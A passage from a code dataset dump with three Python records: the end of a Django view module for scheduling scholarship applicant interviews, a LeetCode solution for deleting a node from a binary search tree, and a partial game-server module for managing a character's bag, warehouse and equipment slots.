render_to_response('resultBusqAgenda.html',{'agendadoDatos':agendadoDatos}, context_instance=RequestContext(request))\n else:\n return render_to_response('noresultados.html',context_instance=RequestContext(request))\n\n if request.POST['hora'] == \"NR\":\n fecha = request.POST['fecha']\n listaHoras = []\n estudianteHora = []\n totalHora = []\n for h in range(len(horas)):\n hor = horas[h].id\n cita = Fechas.objects.filter(fecha = fecha, hora = hor)\n for c in range(len(cita)):\n if c == 0:\n estudianteHora.append(\"hora: \"+horas[h].hora)\n estudianteHora.append(cita[c].nombre.nombre+\" | \"+cita[c].nombre.apellido+\" | C.c \"+cita[c].nombre.documento+\" | Cel: \"+cita[c].nombre.celular)\n return render_to_response('entrevistas.html',{'estudianteHora':estudianteHora, 'fecha':fecha, 'horas':horas},context_instance = RequestContext(request))\n else:\n fecha = request.POST['fecha']\n hora = request.POST['hora']\n estudiante = []\n cita = Fechas.objects.filter(fecha = fecha, hora = hora)\n for c in range(len(cita)):\n estudiante.append(cita[c].nombre.nombre+\" | \"+cita[c].nombre.apellido+\" | C.c \"+cita[c].nombre.documento+\" | Cel: \"+cita[c].nombre.celular)\n return render_to_response('entrevistas.html',{'estudiante':estudiante, 'fecha':fecha, 'horas':horas, 'cita':cita},context_instance = RequestContext(request))\n\n return render_to_response('entrevistas.html',{'horas':horas}, context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef trazabilidad(request, action):\n traza = Traza()\n traza.usuario = request.user.id\n if (Usuario.objects.filter(id=request.user.id).exists()):\n traza.tipo = 'E'\n elif (Profesor.objects.filter(id=request.user.id).exists()):\n traza.tipo = 'P'\n else:\n traza.tipo = 'A'\n traza.accion = action\n traza.save()\n\ndef editarBusquedaParcialmente(request, pk):\n municipio = Municipios.objects.all().order_by()\n universidad = Universidades.objects.all()\n vereda = Veredas.objects.all()\n colegio = Colegios.objects.all()\n sedes = Sedes.objects.all()\n centrosSena = CentrosSena.objects.all()\n aspiranteEstimulo = FormularioEstimulos.objects.get(id = pk )\n if request.method == 'POST':\n documento = request.POST['4Documento']\n aspirante = FormularioEstimulos.objects.filter(documento = documento)\n if (len(aspirante)>=1): # si existe el aspirante\n fechas = Fechas.objects.all()\n fechasAgendadas = []\n for f in fechas:\n fechasAgendadas.append(f.nombre.id)\n if (aspirante[0].id in fechasAgendadas): # si el aspirante esta agendado\n nombreAgendado = aspirante[0].nombre\n documento = aspirante[0].documento\n return render_to_response('formulario_exitoso.html',{'documento':documento}, context_instance=RequestContext(request))\n else:\n formulario = get_object_or_404(FormularioEstimulos, pk=pk)\n formulario.nombre = request.POST['1Nombres']\n formulario.apellido = request.POST['2Apellidos']\n formulario.tipoDocumento = request.POST['3Tipo_documento']\n formulario.documentoOtro = request.POST['documentoOtro']\n formulario.documento = request.POST['4Documento']\n formulario.celular = request.POST['6Celular']\n formulario.edad = request.POST['8Edad']\n formulario.direccionEstudiante = request.POST['12DireEstudiante']\n formulario.ciudadEstudiante = request.POST['Ciudad_estudiante']\n formulario.barrioEstudiante = request.POST['Barrio_vereda_estudiante']\n formulario.ubicacionEstudiante = request.POST['Ubicacion_residencia_estudiante']\n formulario.direccionPadres = request.POST['17DirePadres']\n formulario.ciudadPadres = request.POST['Ciudad_padres']\n formulario.barrioPadres = request.POST['Barrio_vereda_padres']\n formulario.ubicacionPadres = request.POST['Ubicacion_padres']\n formulario.semestreEnCurso = request.POST['semestreEnCurso']\n formulario.valorMatricula = request.POST['32Valor_matricula']\n formulario.totalObtenido = request.POST.getlist('puntajeObtenido')\n formulario.save()\n documento = request.POST['4Documento']\n trazabilidad(request, documento)\n nombre = request.POST['1Nombres']\n nombreAgendado = request.POST['1Nombres']\n documen = documento\n return render_to_response('formulario_exitoso.html',{'documento':documento}, context_instance=RequestContext(request))\n return render_to_response('editarFormularioPorUsuario.html',{'aspiranteEstimulo':aspiranteEstimulo, 'municipio':municipio, 'universidad':universidad, 'vereda':vereda, 'colegio':colegio, 'sedes':sedes, 'centrosSena':centrosSena }, context_instance=RequestContext(request))\n return render_to_response('editarFormularioPorUsuario.html',{'aspiranteEstimulo':aspiranteEstimulo, 'municipio':municipio, 'universidad':universidad, 'vereda':vereda, 'colegio':colegio, 'sedes':sedes, 'centrosSena':centrosSena }, context_instance=RequestContext(request))\n\n\ndef editarFormularioUsuario(request):\n return render_to_response('editarFormularioPorUsuario.html',context_instance = RequestContext(request))\n","sub_path":"proyecto/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":67172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"166496700","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\n\"\"\"\nhttps://leetcode.com/problems/delete-node-in-a-bst/description/\n\nGiven a root node reference of a BST and a key,\ndelete the node with the given key in the BST.\nReturn the root node reference (possibly updated) of the BST.\n\nBasically, the deletion can be divided into two stages:\n\nSearch for a node to remove.\nIf the node is found, delete the node.\nNote: Time complexity should be O(height of tree).\n\n\nExample:\nroot = [5,3,6,2,4,null,7]\nkey = 3\n\n 5\n / \\\n 3 6\n / \\ \\\n2 4 7\n\nGiven key to delete is 3. So we find the node with value 3 and delete it.\n\nOne valid answer is [5,4,6,2,null,null,7], shown in the following BST.\n\n 5\n / \\\n 4 6\n / \\\n2 7\n\nAnother valid answer is [5,2,6,null,4,null,7].\n\n 5\n / \\\n 2 6\n \\ \\\n 4 7\n\n把左邊最大放到被刪除的node便是。\n\"\"\"\n\n\n# Definition for a binary tree node.\nclass TreeNode(object):\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution(object):\n def deleteNode(self, root, key):\n \"\"\"\n :type root: TreeNode\n :type key: int\n :rtype: TreeNode\n \"\"\"\n def dfs(node):\n if node.right:\n return dfs(node.right)\n return node\n\n def find(node):\n next = None\n\n if not node:\n return\n elif node.val < key:\n next = find(node.right)\n node.right = next\n return node\n elif node.val > key:\n next = find(node.left)\n node.left = next\n return node\n else:\n retNode = None\n\n if node.left:\n retNode = node.left\n rightMost = dfs(node.left)\n rightMost.right = node.right\n else:\n retNode = node.right\n\n return retNode\n\n return find(root)\n\ndef build():\n \"\"\"\n 3\n / \\\n 9 20\n / \\\n 15 7\n \"\"\"\n root = TreeNode(3)\n root.left = TreeNode(9)\n root.right = TreeNode(20)\n root.right.right = TreeNode(7)\n root.right.left = TreeNode(15)\n return root, 20\n\ndef pp(node):\n root = [node]\n\n while root:\n print([n.val for n in root])\n root = [child for n in root for child in (n.left, n.right) if child]\n\n\nif __name__ == \"__main__\":\n s = Solution()\n pp(s.deleteNode(*build()))\n print(\"----\")\n pp(s.rewrite(*build()))\n","sub_path":"tree/450_Delete_Node_in_a_BST.py","file_name":"450_Delete_Node_in_a_BST.py","file_ext":"py","file_size_in_byte":2539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"599362972","text":"#coding=utf-8\n'''物品存储,包含背包,仓库,装备栏,行囊栏\n'''\n\nimport cPickle\nimport logging\nimport re\nfrom yuanneng.map.map import Map\nfrom copy import copy\nfrom yuanneng.cmd import *\nfrom yuanneng import prop\nfrom yuanneng.prop import *\nfrom yuanneng.equip import *\nfrom yuanneng.prop import apply as apply_prop\nfrom yuanneng.prop import new as new_prop\nfrom yuanneng.equip import apply as apply_equip\nfrom yuanneng.equip import query_typ as query_equip_typ\nfrom yuanneng.equip import calc_eqp_attr, attack_pos, def_pos, cal_eqp_buff\nfrom yuanneng.item import *\nfrom yuanneng.proto import item_pb2, role_pb2\nfrom yuanneng.proto import login_pb2\nfrom math import ceil\nfrom yuanneng import item\nfrom yuanneng.status import *\nfrom yuanneng import equip\nfrom yuanneng.produce import PRODUCER,add_to_producers\n\nMOUNT_EQP_IDX = TYP_MOUNT - 1 #坐骑在装备栏的索引\nWAREHOUSE_MANAGER = 50048 #仓库管理员\nDEF_BEIBAO_SZ = 32 #初始背包容量\nCANGKU_SZ = 25 #仓库大小\nCANGKU_PROP = 28036 #仓库储物箱\nEQP_BAR_SZ = 17 #装备栏大小\nLUG_BAR_SZ = 2 #行囊栏大小\nCANNT_USE_ITEM = -18 #不可使用物品的状态\nITEM_NOT_EXIST = -8 #物品不存在或格子索引错误\nNOT_LUG = -6 #物品不是行囊\nLUG_POS_OVERFLOW = -7 #行囊栏索引溢出\nCANNT_DRAG_TO = -9\nBAG_FULL = -10 #背包已满\nTRADE_LOCKED = -8 #物品正在被交易锁定\nBAG_IDX_INVALID = -9\nERR_FORMAT = -20 #格子号不对\ndef bag_cmper(i1, i2):\n if not i1:\n return 1\n if not i2:\n return -1\n tid1, tid2 = i1[KEY_TID], i2[KEY_TID]\n\n if tid1 > tid2:\n return 1\n elif tid1 == tid2:\n if KEY_AMOUNT not in i1:\n return 0\n return -1 if i1[KEY_AMOUNT] > i2[KEY_AMOUNT] else 1\n else:\n return -1\n\nclass UserItemStore(object):\n def restore_beibao(self,data):\n '''加载背包数据'''\n if data is None:\n logging.warn('restore beibao:data is None,user gid:%s',self.gid)\n self.init_beibao()\n else:\n try:\n self.beibao = cPickle.loads(data)\n except:\n logging.warn(\"failed to restore beibao data,user gid :%s,reset to init value\",self.gid,exc_info = True)\n self.init_beibao()\n\n def restore_eqp_bar(self,data):\n '''加载装备栏'''\n if data is None:\n logging.warn('restore eqp_bar,data is None,user gid:%s',self.gid)\n self.init_eqp_bar()\n else:\n self.eqp_bar = cPickle.loads(data)\n\n def set_lug_bar_item(self,idx,item):\n self.lug_bar[idx] = item\n self.show_lug_bar_item(idx)\n\n def pop_eqp_bar_item(self,idx,broad = True):\n item = self.eqp_bar[idx]\n self.eqp_bar[idx] = None\n if item and broad:\n self.show_eqp_item(idx)\n return item\n\n def set_eqp_bar_item(self,idx,item):\n self.eqp_bar[idx] = item\n self.show_eqp_item(idx)\n\n def restore_lug_bar(self,data):\n '''加载行囊栏数据'''\n if data is None:\n logging.warn(\"restore lug_bar:data is None,user gid:%s\",self.gid)\n self.init_lug_bar()\n else:\n try:\n self.lug_bar = cPickle.loads(data)\n except:\n logging.warn(\"failed to restore lugbar ,user gid:%s,reset to init value\",self.gid,exc_info = True)\n self.init_lug_bar()\n\n def restore_cangku(self,data):\n '''加载仓库数据'''\n if data is None:\n logging.warn('restore cangku:data is None,user gid:%s',self.gid)\n self.init_cangku()\n else:\n try:\n self.cangku = cPickle.loads(data)\n except:\n logging.warn(\"failed to restore cangku,user gid : %s,reset to init value\",self.gid, exc_info = True)\n self.init_cangku()\n\n def get_beibao_data(self):\n '''序列化背包数据'''\n return cPickle.dumps(self.beibao,cPickle.HIGHEST_PROTOCOL)\n\n def get_eqp_bar_pb_data(self):\n '''\n 获取使用protobuf系列化的角色装备栏数据\n 用于缓存角色的装备信息(避免多次序列化)\n '''\n res = item_pb2.OthersStoreRes()\n res.id = self.gid\n get_store_pb2(self.eqp_bar, res = res.store)\n res.name = self.name\n res.level = self.level\n res.gender = self.gender\n res.pro = self.pro\n return res.SerializeToString()\n\n def get_eqp_bar_data(self):\n '''序列化装备栏数据'''\n return cPickle.dumps(self.eqp_bar,cPickle.HIGHEST_PROTOCOL)\n\n # def get_lug_data(self):\n # '''序列化行囊包裹数据'''\n # return cPickle.dumps(self.lug,cPickle.HIGHEST_PROTOCOL)\n\n def get_lug_bar_data(self):\n '''序列化行囊栏数据'''\n return cPickle.dumps(self.lug_bar,cPickle.HIGHEST_PROTOCOL)\n\n def get_cangku_data(self):\n '''序列化仓库数据'''\n return cPickle.dumps(self.cangku,cPickle.HIGHEST_PROTOCOL)\n\n def init_beibao(self):\n '''设置背包数据,此方法主要在角色创建时调用'''\n self.beibao = [0] * DEF_BEIBAO_SZ\n #送礼包方式待定\n #self.beibao[0] = new_prop(21024 + self.pro,1,1)\n\n def init_eqp_bar(self):\n '''设置装备栏数据,此方map_broad_it法主要在角色创建时调用'''\n self.eqp_bar = [0] * EQP_BAR_SZ\n self.eqp_bar[12] = {KEY_TID: 10131,KEY_BIND : True, KEY_STAR : 3, KEY_COLOR : 3, KEY_STREN : 0, KEY_NAIJIU: 200 * 1000, KEY_REPAIR_CNT : 3,\n KEY_EXTRA: {'wlgj':30,'jsgj':30,'mz':20}}\n\n # def set_lug(self,lug):\n # '''设置行囊包裹数据,此方法主要在角色创建时调用'''\n # self.lug = lug\n\n def init_lug_bar(self):\n '''设置行囊栏数据,此方法主要在角色创建时调用'''\n self.lug_bar = [0] * LUG_BAR_SZ\n\n def init_cangku(self):\n '''设置仓库数据,此方法主要在角色创建时调用'''\n self.cangku = [0] * CANGKU_SZ\n\n def show_beibao_item(self,idx):\n '''向客户端同步背包某一个格子的数据\n idx为格子索引,从0开始'''\n res = item_pb2.StoreItem()\n res.position = idx + 1\n fill_storeitem_pb2(self.beibao[idx],res)\n self.tell_object('E02',1,res)\n\n def show_cangku_item(self,idx):\n '''向客户端同步仓库某一个格子的数据\n idx为格子索引,从0开始'''\n res = item_pb2.StoreItem()\n res.position = idx + 1\n fill_storeitem_pb2(self.cangku[idx],res)\n self.tell_object('E02',2,res)\n\n def show_lug_bar_item(self,idx):\n '''向客户端同步行囊栏一个格子的数据\n idx为格子索引,从0开始'''\n res = item_pb2.StoreItem()\n res.position = idx + 1\n fill_storeitem_pb2(self.lug_bar[idx],res)\n self.tell_object('E02',11,res)\n\n def show_eqp_item(self,idx):\n '''向客户端同步行囊栏一个格子的数据\n idx为格子索引,从0开始'''\n res = item_pb2.StoreItem()\n res.position = idx + 1\n fill_storeitem_pb2(self.eqp_bar[idx],res)\n self.tell_object('E02',3,res)\n\n\n def reduce_items(self,reduce_items):\n '''\n 从背包扣除物品\n 调用前应该先调用has_enough_items进行校验\n 扣除成功返回True\n 失败返回False 但有可能扣除掉一部分物品(所以需要先校验)\n 扣除物品顺序:先扣除绑定的,然后扣除非绑定的\n '''\n reduce_items = copy(reduce_items)\n unbind_item = {}\n beibao = self.beibao\n for idx,item in enumerate(beibao):\n if not item:\n continue\n tid = item[KEY_TID]\n if tid not in reduce_items:\n continue\n if not item[KEY_BIND]:\n if tid not in unbind_item:\n unbind_item[tid] = [idx]\n else:\n unbind_item[tid].append(idx)\n continue\n need_amount = reduce_items[tid]\n current_amount = item.get(KEY_AMOUNT,1)\n if current_amount <= need_amount:\n #直接删掉物品\n self.empty_beibao_item(idx)\n else:\n item[KEY_AMOUNT] -= need_amount\n self.show_beibao_item(idx)\n if current_amount >= need_amount:\n del reduce_items[tid]\n if not reduce_items:\n return True\n else:\n reduce_items[tid] -= current_amount\n for tid, idxs in unbind_item.iteritems():\n if tid not in reduce_items:\n continue\n for idx in idxs:\n item = beibao[idx]\n need_amount = reduce_items[tid]\n current_amount = item.get(KEY_AMOUNT,1)\n if current_amount <= need_amount:\n self.empty_beibao_item(idx)\n else:\n item[KEY_AMOUNT] -= need_amount\n self.show_beibao_item(idx)\n if current_amount >= need_amount:\n del reduce_items[tid]\n if not reduce_items:\n return True\n break\n else:\n reduce_items[tid] -= current_amount\n return not reduce_items\n\n\n def has_enough_items(self,need_item):\n '''校验背包中是否有足够的物品\n need_item 物品dict,key为物品模板id,value为需要数量\n '''\n need_item = copy(need_item)\n for item in self.beibao:\n if not item:\n continue\n tid = item[KEY_TID]\n if tid not in need_item:\n continue\n need_item[tid] -= item.get(KEY_AMOUNT,1)\n if need_item[tid] <= 0:\n del need_item[tid]\n if not need_item:\n return True\n return not need_item\n\n def combine_items(self):\n ''' 整合背包的物品 '''\n for idx,item in enumerate(self.beibao):\n if not item or not is_prop(item[KEY_TID]):\n continue\n max_stack = query_max_stack(item[KEY_TID])\n if item[KEY_AMOUNT] >= max_stack:\n continue\n for combine_idx in xrange(0,idx):\n combine_item = self.beibao[combine_idx]\n if not combine_item or combine_item[KEY_TID] != item[KEY_TID] or combine_item[KEY_BIND] != item[KEY_BIND] or not is_prop(combine_item[KEY_TID]) or combine_item[KEY_AMOUNT] >= query_max_stack(combine_item[KEY_TID]):\n continue\n max_combine = max_stack - combine_item[KEY_AMOUNT]\n if item[KEY_AMOUNT] <= max_combine:\n self.beibao[idx] = 0\n combine_item[KEY_AMOUNT] += item[KEY_AMOUNT]\n break\n else:\n combine_item[KEY_AMOUNT] = max_stack\n item[KEY_AMOUNT] -= max_combine\n\n def combine_cangku_items(self):\n ''' 整合仓库的物品 '''\n for idx,item in enumerate(self.cangku):\n if not item or not is_prop(item[KEY_TID]):\n continue\n max_stack = query_max_stack(item[KEY_TID])\n if item[KEY_AMOUNT] >= max_stack:\n continue\n for combine_idx in xrange(0,idx):\n combine_item = self.cangku[combine_idx]\n if not combine_item or combine_item[KEY_TID] != item[KEY_TID] or combine_item[KEY_BIND] != item[KEY_BIND] or not is_prop(combine_item[KEY_TID]) or combine_item[KEY_AMOUNT] >= query_max_stack(combine_item[KEY_TID]):\n continue\n max_combine = max_stack - combine_item[KEY_AMOUNT]\n if item[KEY_AMOUNT] <= max_combine:\n self.cangku[idx] = 0\n combine_item[KEY_AMOUNT] += item[KEY_AMOUNT]\n break\n else:\n combine_item[KEY_AMOUNT] = max_stack\n item[KEY_AMOUNT] -= max_combine\n\n def combine_to_bag(self,item,lock_seg = None):\n '''将可堆叠的物品整合到背包中\n item为要整合的物品\n lock_seg为背包中锁住的格子段,为tuple,(起始idx,结束idx),为None表示无锁\n 整合成功返回True,会主动通知客户端该格子位置的数据变化\n 失败返回False\n '''\n tid = item[KEY_TID]\n amount = item[KEY_AMOUNT]\n max_stack = query_max_stack(tid)\n bind = item[KEY_BIND]\n for idx,grid in enumerate(self.beibao):\n if lock_seg:\n if idx >= lock_seg[0] and idx <= lock_seg[1]:\n continue\n if not grid or grid[KEY_TID] != tid or grid[KEY_BIND] != bind:\n continue\n if grid[KEY_AMOUNT] + amount > max_stack:\n continue\n grid[KEY_AMOUNT] += amount\n self.show_beibao_item(idx)\n return True\n return False\n\n def combine_to_cangku(self,item):\n '''将可堆叠的物品整合到仓库中\n item为要整合的物品\n 整合成功返回True,会主动通知客户端该格子位置的数据变化\n 失败返回False\n '''\n tid = item[KEY_TID]\n amount = item[KEY_AMOUNT]\n max_stack = query_max_stack(tid)\n bind = item[KEY_BIND]\n for idx,grid in enumerate(self.cangku):\n if not grid or grid[KEY_TID] != tid or grid[KEY_BIND] != bind:\n continue\n if grid[KEY_AMOUNT] + amount > max_stack:\n continue\n grid[KEY_AMOUNT] += amount\n self.show_cangku_item(idx)\n return True\n return False\n\n def add_to_bag(self,item,lock_seg = None,can_combine = True):\n '''将物品存入背包\n item为要存入的物品\n lock_seg为背包中锁住的格子段,为tuple,(起始idx,结束idx),为None表示无锁\n 存入成功返回True,失败返回False\n '''\n if not item:\n logging.warn(\"add_to_bag, item is empty, gid:%s\", self.gid)\n return\n if is_prop(item[KEY_TID]) and (query_max_stack(item[KEY_TID]) > item[KEY_AMOUNT]) and can_combine:\n if self.combine_to_bag(item,lock_seg = lock_seg):\n return True\n for idx,grid in enumerate(self.beibao):\n if lock_seg:\n if idx >= lock_seg[0] and idx <= lock_seg[1]:\n continue\n if not grid:\n self.beibao[idx] = item\n self.show_beibao_item(idx)\n return True\n return False\n\n def add_to_cangku(self,item,can_combine = True):\n '''将物品存入仓库\n item为要存入的物品\n 存入成功返回True,失败返回False\n '''\n if not item:\n logging.warn(\"add_to_cangku, item is empty, gid:%s\", self.gid)\n return\n if is_prop(item[KEY_TID]) and (query_max_stack(item[KEY_TID]) > item[KEY_AMOUNT]) and can_combine:\n if self.combine_to_cangku(item):\n return True\n for idx,grid in enumerate(self.cangku):\n if lock_seg:\n if idx >= lock_seg[0] and idx <= lock_seg[1]:\n continue\n if not grid:\n self.cangku[idx] = item\n self.show_cangku_item(idx)\n return True\n return False\n\n def query_empty_count(self,lock_seg = None):\n '''查询背包空余格子数'''\n if not lock_seg:\n data = self.beibao\n else:\n data = self.beibao[:lock_seg[0]] + self.beibao[lock_seg[1]:]\n return sum(item is None or item == 0 for item in data)\n\n def query_cangku_empty_count(self):\n '''查询仓库空余格子数'''\n return sum(item is None or item == 0 for item in self.cangku)\n\n def has_item(self,tid,bind = None):\n '''检测背包中是否有一种物品'''\n for item in self.beibao:\n if not item:\n continue\n if tid == item[KEY_TID]:\n if bind is None:\n return True\n else:\n if bind == item[KEY_BIND]:\n return True\n return False\n\n def reduce_item_by_idx(self,idx):\n item = self.beibao[idx]\n if not item:\n return False\n if item[KEY_AMOUNT] > 1:\n item[KEY_AMOUNT] -= 1\n self.show_beibao_item(idx)\n else:\n self.empty_beibao_item(idx)\n\n\n def add_ck_money(self, val):\n self.ck_money += val\n\n def reduce_ck_money(self, val):\n self.ck_money -= val\n\n def has_ck_money(self, val):\n return self.ck_money >= val\n\n def empty_beibao_item(self,idx,broad = True):\n '''删除背包某个格子的数据\n idx为索引号,从0开始'''\n self.beibao[idx] = 0\n if broad:\n self.show_beibao_item(idx)\n\n def empty_cangku_item(self,idx,broad = True):\n '''删除仓库某个格子的数据\n idx为索引号,从0开始'''\n self.cangku[idx] = 0\n if broad:\n self.show_cangku_item(idx)\n\n def empty_eqp_item(self,idx,broad = True):\n '''删除装备栏某个格子的数据\n idx为索引号,从0开始'''\n self.eqp_bar[idx] = 0\n if broad:\n self.show_eqp_item(idx)\n\n def empty_lug_item(self,idx):\n '''删掉行囊栏某个格子的数据,如果后续有行囊,则将后续的迁移\n 只负责行囊栏数据,不负责相应的背包数据\n idx为索引号,从0开始'''\n self.lug_bar[idx] = 0\n for i in range(idx + 1, len(self.lug_bar)):\n if self.lug_bar[i]:\n self.lug_bar[i - 1] = self.lug_bar[i]\n self.lug_bar[i] = 0\n self.tell_object('E01',6,get_store_pb2(self.lug_bar))\n\n def extend_beibao(self,size):\n oldlen = len(self.beibao)\n newlen = oldlen + size\n self.beibao = self.beibao + [0] * size\n\n self.tell_object('E01',1,get_store_pb2(self.beibao,(oldlen,newlen)))\n\n def query_used_count(self,start_idx,end_idx):\n '''查询角色背包某一段使用的格子数'''\n return sum(item is not None and item != 0 for item in self.beibao[start_idx : end_idx])\n\n def reset_beibao_seg(self,start_idx,end_idx,new_lug_size):\n '''将背包中一段的数据重置大小'''\n before = self.beibao[:start_idx]\n after = self.beibao[end_idx:]\n seg = self.beibao[start_idx : end_idx]\n new_seg = [0] * new_lug_size\n new_idx = 0\n for item in seg:\n if item:\n new_seg[new_idx] = item\n new_idx += 1\n self.beibao = before + new_seg + after\n self.tell_object('E01',1,get_store_pb2(self.beibao,(start_idx, len(self.beibao))))\n\ndef fill_storeitem_pb2(item,pb2_obj):\n '''填充物品的protobuf数据对象'''\n if not item:\n pb2_obj.empty = True\n return\n pb2_obj.empty = False\n fill_item_pb2(item,pb2_obj.item)\n\ndef fill_item_pb2(item,pb2_obj,with_amount = True):\n pb2_obj.tid = item[KEY_TID]\n pb2_obj.bind = item[KEY_BIND]\n if is_prop(item[KEY_TID]):\n if with_amount:\n pb2_obj.amount = item[KEY_AMOUNT]\n elif query_equip_typ(item[KEY_TID]) != TYP_MOUNT:\n equip_obj = pb2_obj.equip_info\n equip_obj.stren = item[KEY_STREN]\n equip_obj.star = item[KEY_STAR]\n equip_obj.color = item[KEY_COLOR]\n equip_obj.repair_cnt = item[KEY_REPAIR_CNT]\n #服务器存储耐久度 × 1000,每次向上取整通知客户端\n equip_obj.naijiu = int (ceil(item[KEY_NAIJIU] / 1000.0))\n for k,v in item[KEY_EXTRA].items():\n ext = equip_obj.extra.add()\n ext.key, ext.value = k, v\n if KEY_ZIZHI in item:\n equip_obj.zizhi.value1, equip_obj.zizhi.value2 = item[KEY_ZIZHI]\n if KEY_HOLE in item:\n for stone_id in item[KEY_HOLE]:\n equip_obj.holes.append(stone_id)\n if KEY_SANCTIFICATION in item:\n equip_obj.san_lvl = item[KEY_SANCTIFICATION][1]\n equip_obj.san_kind = item[KEY_SANCTIFICATION][0]\n if KEY_FULING in item:\n for buffid, lv in item[KEY_FULING]:\n fuling = equip_obj.fuling.add()\n fuling.buffid = buffid\n fuling.level = lv\n if REMAKE_LEVEL in item:\n equip_obj.changelevel = item[REMAKE_LEVEL]\n\ndef get_store_pb2(store,seg = None,res = None):\n '''格式化背包/仓库/装备栏/行囊栏的数据(用来发送给客户端)\n 当只格式化某一段的数据时,可使用seg指定开始和结束的位置\n 两者都从0开始,包含起始,不包含结束,如(0,3) -> 0,1,2\n '''\n if not res:\n res = item_pb2.StoreRes()\n res.size = len(store)\n if seg:\n start,end = seg[0],seg[1]\n else:\n start,end = 0,res.size\n\n for idx in range(start,end):\n item_pb = res.items.add()\n item_pb.position = idx + 1\n fill_storeitem_pb2(store[idx],item_pb)\n return res\n\n@route('E01',require_para = login_pb2.FlagReq)\n@cmd_exception_catch()\ndef show_store(obj,data):\n '''显示背包/仓库/行囊栏的内容\n '''\n arg = data.flag\n if arg == 1:\n obj.tell_object('E01', arg, get_store_pb2(obj.beibao))\n elif arg == 2:\n if not obj.vip_level:\n if not obj.map_obj.is_around_npc(WAREHOUSE_MANAGER, obj.x, obj.y):\n return\n res = get_store_pb2(obj.cangku)\n res.money = obj.ck_money\n obj.tell_object('E01', arg, res)\n elif arg == 3:\n obj.tell_object('E01', arg, get_store_pb2(obj.eqp_bar))\n elif arg == 4:\n pass\n elif arg == 5:\n pass\n elif arg == 6:\n obj.tell_object('E01', arg, get_store_pb2(obj.lug_bar))\n\n@route('E03',require_para = item_pb2.PositionReq)\n@cmd_exception_catch()\ndef use_item(obj,data):\n '''使用物品'''\n if not obj.valid_use_item():\n obj.tell_object('E03',CANNT_USE_ITEM)\n return\n idx = data.position - 1\n if idx < 0 or idx >= len(obj.beibao):\n obj.tell_object('E03',ITEM_NOT_EXIST)\n return\n item = obj.beibao[idx]\n if not item:\n obj.tell_object('E03',ITEM_NOT_EXIST)\n return\n if item[KEY_TID] in PRODUCER:\n add_to_producers(obj, idx, item)\n return\n elif is_prop(item[KEY_TID]):\n result = apply_prop(obj,idx,item)\n else:\n result = apply_equip(obj,idx,item)\n\n if isinstance(result, int) and result < 0:\n obj.tell_object('E03',result)\n else:\n if data.taskid:\n obj.task_use_item(item[KEY_TID], data.taskid)\n obj.tell_object('E03',1)\n\n\n@route('E04',require_para = item_pb2.PositionReq)\n@cmd_exception_catch()\ndef drop_item(obj,data):\n idx = int(data.position) - 1\n if not obj.valid_use_item():\n obj.tell_object('E04',CANNT_USE_ITEM)\n return\n if idx < 0 or idx >= len(obj.beibao):\n obj.tell_object('E04',ITEM_NOT_EXIST)\n return\n item = obj.beibao[idx]\n if not item:\n obj.tell_object('E04',ITEM_NOT_EXIST)\n return\n# if not item[KEY_BIND]:\n# obj.map_obj.drop_item(tid = item[KEY_TID], x= obj.x, y = obj.y, owner_id = obj.gid, item = item, is_protected = 0)\n obj.empty_beibao_item(idx)\n@route('E06',require_para = item_pb2.DragPositionReq)\n@cmd_exception_catch()\ndef drag_item_in_bag(obj,data):\n if not obj.valid_use_item():\n obj.tell_object('E06',CANNT_USE_ITEM)\n return\n from_idx,to_idx = int(data.from_pos) -1, int(data.to_pos - 1)\n beibao_len = len(obj.beibao)\n if from_idx < 0 or from_idx >= beibao_len or not obj.beibao[from_idx]:\n obj.tell_object('E06',ITEM_NOT_EXIST)\n return\n if to_idx < 0 or to_idx >= beibao_len:\n return\n# if obj.trading:\n# obj.tell_object('E06',TRADE_LOCKED)\n# return\n from_item = obj.beibao[from_idx]\n to_item = obj.beibao[to_idx]\n if from_item and to_item and is_prop(from_item[KEY_TID]) and from_item[KEY_TID] == to_item[KEY_TID] and from_item[KEY_BIND] == to_item[KEY_BIND]:\n from_amount, to_amount = from_item[KEY_AMOUNT], to_item[KEY_AMOUNT]\n max_stack = query_max_stack(from_item[KEY_TID])\n if from_amount + to_amount > max_stack:\n to_item[KEY_AMOUNT] = max_stack\n from_item[KEY_AMOUNT] -= max_stack - to_amount\n else:\n to_item[KEY_AMOUNT] += from_amount\n obj.empty_beibao_item(from_idx,broad = False)\n else:\n obj.beibao[from_idx],obj.beibao[to_idx] = obj.beibao[to_idx],obj.beibao[from_idx]\n obj.show_beibao_item(from_idx)\n obj.show_beibao_item(to_idx)\n obj.tell_object(\"E06\",1)\n\n@route('E07', require_para = item_pb2.ItemSplit)\n@cmd_exception_catch()\ndef item_split(obj,data):\n if not obj.valid_use_item():\n obj.tell_object('E07',CANNT_USE_ITEM)\n return\n idx = data.position - 1\n if idx < 0 or idx >= len(obj.beibao):\n obj.tell_object('E07',-2)\n return\n if not obj.beibao[idx]:\n obj.tell_object('E07',-2)\n return\n if obj.beibao[idx][KEY_AMOUNT] <= data.amount:\n obj.tell_object('E07',-3)\n return\n if obj.query_empty_count() <= 0:\n obj.tell_object('E07',-1)\n return\n old_item = obj.beibao[idx]\n new_item = copy(old_item)\n old_item[KEY_AMOUNT] -= data.amount\n new_item[KEY_AMOUNT] = data.amount\n obj.show_beibao_item(idx)\n obj.add_to_bag(new_item, can_combine = False)\n obj.tell_object('E07',1)\n\n@route('E08')\n@cmd_exception_catch()\ndef sort_bag(obj,data):\n ''' 背包整理 '''\n if not obj.valid_use_item():\n obj.tell_object('E08',CANNT_USE_ITEM)\n return\n obj.combine_items()\n obj.beibao.sort(bag_cmper)\n obj.tell_object('E01', 1, get_store_pb2(obj.beibao))\n obj.tell_object('E08',1)\n\n@route('E09', require_para = item_pb2.DragPositionReq)\n@cmd_exception_catch()\ndef drag_to_cangku(obj, data):\n ''' 从背包拖动东西到仓库 '''\n if not obj.vip_level:\n if not obj.map_obj.is_around_npc(WAREHOUSE_MANAGER, obj.x, obj.y):\n return\n if obj.query_cangku_empty_count() <= 0:\n return\n from_idx, to_idx = data.from_pos - 1, data.to_pos - 1\n if from_idx >= len(obj.beibao) or to_idx >= len(obj.cangku):\n return\n if obj.cangku[to_idx] or not 